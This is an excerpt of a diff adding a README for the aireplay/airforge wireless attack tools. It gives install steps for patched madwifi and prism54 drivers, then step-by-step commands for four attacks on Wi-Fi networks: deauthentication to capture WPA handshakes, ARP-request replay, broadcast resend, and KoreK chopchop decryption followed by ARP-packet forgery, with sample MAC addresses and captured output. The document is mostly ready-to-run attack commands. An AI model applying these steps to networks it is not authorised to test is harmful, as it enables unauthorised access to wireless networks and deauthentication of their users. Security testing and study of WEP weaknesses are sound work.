2604 +mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
2605 +ifconfig wlan0 down
2606 +wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
2607 +/etc/init.d/pcmcia restart
2611 + 1.2. Installing madwifi
2612 + -----------------------
2614 +Note: a tarball is also available at http://madwifi.otaku42.de/
2617 +cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi
2619 +patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1
2625 + 1.3. Installing prism54
2626 + -----------------------
2628 +Make sure the hotplug package is installed and hotplug firmware
2629 +loading support is present in your kernel (module firmware_class).
2632 +wget http://prism54.org/pub/linux/snapshot/tars/prism54-svn-latest.tar.bz2
2633 +tar -xvjf prism54-svn-latest.tar.bz2
2634 +cd prism54-svn-latest
2637 +mkdir -p /usr/lib/hotplug/firmware
2638 +wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
2639 +mv 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
2646 + *** aireplay does not capture replies: ***
2647 + *** you must also start airodump (not Kismet!) ***
2649 + If you use madwifi, you may have to place the card in
2650 + pure 802.11b mode first:
2654 + If you use wlan-ng, run ./wlanng.sh start wlan0 <channel>
2657 +iwconfig ath0 mode Monitor channel <channel>
2661 + 2.1. Attack 1: deauthentication
2662 + -------------------------------
2664 +This attack is especially useful to capture an ESSID or a WPA handshake;
2665 +it will not generate WEP traffic (or very little).
2667 +./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap
2668 +./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0
2671 + 2.2. Attack 2: classic arp-request resend
2672 + -----------------------------------------
2674 +./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0
2677 + 2.3. Attack 3: data broadcast resend
2678 + ------------------------------------
2680 +This attack is quite unreliable and often doesn't work. You need
2681 +the MAC address of an authenticated station so that the AP will
2682 +not drop the packets. As most APs work in open authentication mode,
2683 +if you have another wireless card, you can simply associate it
2684 +and use its MAC address.
2686 +./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0
2689 + 2.4. Attack 4: arp-request forgery
2690 + ----------------------------------
2692 +First, we need a prga by decrypting a data packet. For this, add the -k
2693 +flag which will enable KoreK's chopchop attack:
2697 +This attack may not work in deauthenticated mode (in which the source
2698 +MAC address is forged). If this is the case, you will have the pass the
2699 +address of an authenticated station:
2701 +./aireplay -h 00:09:5B:FC:21:F4 -k eth1
2703 +If no station is authenticated, and you have a spare wireless card
2704 +(say, an orinoco on eth1) you can use it to associate with the AP
2705 +as most Access Points run in open authentication mode and do not
2706 +actually check the WEP key - then use the MAC adresse of eth1 when
2707 +running the chopchop attack. Having an authenticated station is
2708 +also useful when there are no connected clients, so that the AP
2709 +will send broadcast packets to the air (even though when don't
2710 +know the WEP key yet).
2712 +iwconfig eth1 mode Managed essid "whathever" key 1111111111
2715 +If the attack suceeded, have a look at the decrypted packet:
2717 +tcpdump -e -n -t -r replay_dec-050320-023844.cap
2719 +BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap
2720 +SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 10.0.0.2.32774 > 10.0.0.3.22: S
2721 +2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...>
2723 +Now we have enough information to forge an ARP request:
2725 +./airforge replay_dec-050320-023844.xor 1 00:02:2d:aa:9c:13 \
2726 +00:09:5b:fc:21:f4 10.0.0.2 10.0.0.3 arp.cap
2730 +./aireplay -r arp.cap ath0